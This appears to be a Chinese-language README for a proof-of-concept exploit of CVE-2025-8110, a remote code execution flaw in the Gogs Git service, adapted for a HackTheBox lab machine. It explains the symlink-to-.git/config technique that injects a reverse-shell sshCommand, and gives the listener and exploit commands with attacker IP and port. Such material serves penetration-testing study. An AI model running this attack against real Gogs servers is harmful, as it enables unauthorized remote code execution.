免责声明: 本工具仅供教育目的和授权渗透测试使用。请仅针对您拥有明确测试权限的系统使用。
这是 zAbuQasem/gogs-CVE-2025-8110 的修改版本,已适配 HackTheBox 上的 Silentium 机器。原始 PoC 需要调整以应对 Silentium 特定的 Gogs 配置和认证流程。
CVE-2025-8110 是 Gogs(一个自托管的 Git 服务)中的一个远程代码执行漏洞。
Gogs 的文件更新 API 端点(PUT /api/v1/repos/.../contents/<file>)不会验证目标文件是否为符号链接。经过身份验证的攻击者可以将指向 .git/config 的符号链接推送到仓库中,然后利用该 API 用恶意载荷覆盖它。该载荷会将自定义的 sshCommand 注入到 git 配置中,Gogs 在下次对该仓库执行 SSH 操作时会在服务端执行该命令,从而实现远程代码执行。
malicious_link -> .git/config)并推送。sshCommand = <reverse shell> 的恶意 .git/config。.git/config,在下次执行 SSH 操作时触发 Shell。安装依赖:
pip install -r requirements.txt
启动监听器:
nc -lvnp <PORT>
运行漏洞利用程序:
python3 CVE-2025-8110.py -u http://<TARGET_URL> -lh <YOUR_IP> -lp <PORT> -un <USERNAME> -pw <PASSWORD>
可选 — 通过 Burp Suite 路由流量:
python3 CVE-2025-8110.py -u http://<TARGET_URL> -lh <YOUR_IP> -lp <PORT> -un <USERNAME> -pw <PASSWORD> -x
| 参数 | 描述 |
|---|
-u | Gogs 基础 URL |
-lh | 您的攻击机 IP(反向 Shell 主机) |
-lp | 您的监听端口 |
-un | 您注册的 Gogs 用户名 |
-pw | 您的 Gogs 密码 |
-x | (可选)通过 localhost:8080 上的 Burp 路由流量 |